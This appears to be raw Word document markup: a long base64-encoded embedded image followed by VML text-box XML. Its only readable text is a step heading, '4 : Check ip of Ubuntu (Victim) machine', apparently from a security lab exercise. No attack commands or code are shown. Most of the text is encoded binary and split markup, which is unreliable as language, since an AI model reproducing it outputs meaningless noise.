&#10;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&#10;9Pk3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rNUF6wQAAJYY&#10;AAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQABnIT1OgYB&#10;ADoGAQAUAAAAAAAAAAAAAAAAAFQHAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ1BLAQItABQABgAIAAAA&#10;IQCtJd713QAAAAUBAAAPAAAAAAAAAAAAAAAAAMANAQBkcnMvZG93bnJldi54bWxQSwECLQAUAAYA&#10;CAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAAAAAAAADKDgEAZHJzL19yZWxzL2Uyb0RvYy54bWwu&#10;cmVsc1BLBQYAAAAABgAGAHwBAAC7DwEAAAA=&#10;">
                <v:rect id="Rectangle 2708" o:spid="_x0000_s1176" style="position:absolute;width:766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214F0B56"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4 :</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2709" o:spid="_x0000_s1177" style="position:absolute;left:5775;width:1057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7839B641" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Check </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>ip</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> of </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2710" o:spid="_x0000_s1178" style="position:absolute;left:13719;width:913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1936E033" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Ubuntu (V</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2711" o:spid="_x0000_s1179" style="position:absolute;left:20592;width:434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65DCF132" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>ictim</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2712" o:spid="_x0000_s1180" style="position:absolute;left:23853;width:61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6364C9CB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2713" o:spid="_x0000_s1181" style="position:absolute;left:24311;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5243AFC6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2714" o:spid="_x0000_s1182" style="position:absolute;left:24737;width:756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6839802E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>machine</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2715" o:spid="_x0000_s1183" style="position:absolute;left:30424;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288094E3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2716" o:spid="_x0000_s1184" style="position:absolute;left:59448;top:34098;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14545E25" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 2727" o:spid="_x0000_s1185" type="#_x0000_t75" style="position:absolute;left:383;top:1862;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4nxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvgv9hGcGL6MQcaomuIoXSSk/VUuhtyI7ZYHY2ZFeN/vpuoeDx8eZ9b95q07tGXbgLtRcN81kG&#10;iqX0ppZKw9fhdfoMKkQSQ40X1nDjAJv1cLCiwvirfPJlHyuVIBIK0mBjbAvEUFp2FGa+ZUne0XeO&#10;YpJdhaaja4K7BvMse0JHtaQGSy2/WC5P+7NLb3zssjDZTba3HyQ8nt4O3xbvWo9H/XYJKnIfH8f/&#10;6XejIV/kC/hbkxCA618AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAClneJ8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZ